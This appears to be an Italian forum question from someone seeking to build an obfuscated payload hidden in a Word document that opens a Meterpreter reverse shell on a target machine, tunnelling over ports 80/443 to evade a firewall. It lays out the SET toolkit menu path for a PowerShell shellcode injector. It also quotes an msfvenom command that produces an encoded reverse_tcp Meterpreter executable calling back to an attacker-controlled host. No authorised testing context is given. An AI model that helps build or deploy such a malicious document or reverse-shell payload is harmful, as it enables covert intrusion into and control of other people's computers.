Sto cercando di creare un payload per l'inserimento come codice offuscato in un documento Word, che creerà un listener sulla macchina attaccata e mi consentirà di eseguire alcuni comandi (non attraverso il file .exe come mostrato nei toni dei video )
Sto assumendo: La macchina attaccata è dietro un firewall, che blocca il traffico in uscita eccetto per la porta 80 e 443. Quindi voglio che il traffico della macchina attaccata venga inoltrato a quelle porte, così posso ascoltare ed eseguire.
Sto usando SET toolkit (in Kali), scegli "social-engineering attack" - > powershell attack vettori - > iniettore di codice shell alfanumerico.
Richiede LHOST, che è il mio IP pubblico, inoltrato al mio IP interno (sono dietro al router).
Quindi richiede LPORT e il gioco è fatto.
La mia comprensione è LPORT - Local Port, che significa porta che accetterò il traffico proveniente dalla macchina attaccata. Ma in questo caso, come posso specificare una porta in uscita per la macchina ATTACKED?
Vorrei una soluzione meterpreter, se possibile. Non mi interessa se è un vettore PowerShell o altro, dal momento che il carico utile, se ho capito correttamente, mi apre solo la possibilità di ascoltare ed eseguire comandi sulla macchina attaccata.
Su un cheatsheet di SANS Institute ho trovato un comando interessante:
msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Qui sembra che LPORT sia stato introdotto nel file malware, ma in questo caso sarà esattamente ciò di cui ho bisogno; una porta per il traffico in uscita dalla macchina attaccata.